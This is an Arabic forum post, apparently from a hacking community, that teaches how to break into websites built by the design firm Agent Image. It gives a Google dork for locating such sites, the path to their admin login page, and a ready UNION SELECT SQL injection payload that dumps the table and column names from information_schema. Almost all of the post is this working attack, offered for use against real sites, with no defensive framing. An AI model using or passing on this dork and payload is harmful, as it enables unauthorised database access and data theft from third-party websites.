السلام عليكم ورحمة الله وبركاتة
كيفكم شباب والله توحشتونى من امس لليوم
يلا خلينى نخش دغرى با الموضوع
معاى
اليوم ثغرة بشركة Agent Image الدورك الخاص شرح الاستغلال
والاستغلا راح يكون sql

خلينا نخش با الشرح
اولا
دورك الثغرة الموجودة با الشركة
كود PHP:
Dork : intext:"Design by Agent Image" & inurl:agents_details.php?agent_ID=
ثانيا مسار اللوحة
كود:
cpanel:http://www.site.com/login.php
الاستغلال
كود:
http://www.site.com/{path}=-{number}'+ UNION SELECT 11111,211111,3111111,411111,group_concat(table_name,0x3a,column_name,0x3a,table_schema),611111+from+information_schema.columns+)-- -
انتهى شباب
ان اعجبك لا تنسانى من تقيماتك
الاهداء الى الجميع بلا استثناء
وتحياتى الى اخى الاكبر وحبيبى عبد الصمد
محمد الفسكاوى
luhn hgd,l eyvm fav;m Agent Image +hg],v; hgohw+ avp hghsjyghg dork eyvm ],v; sql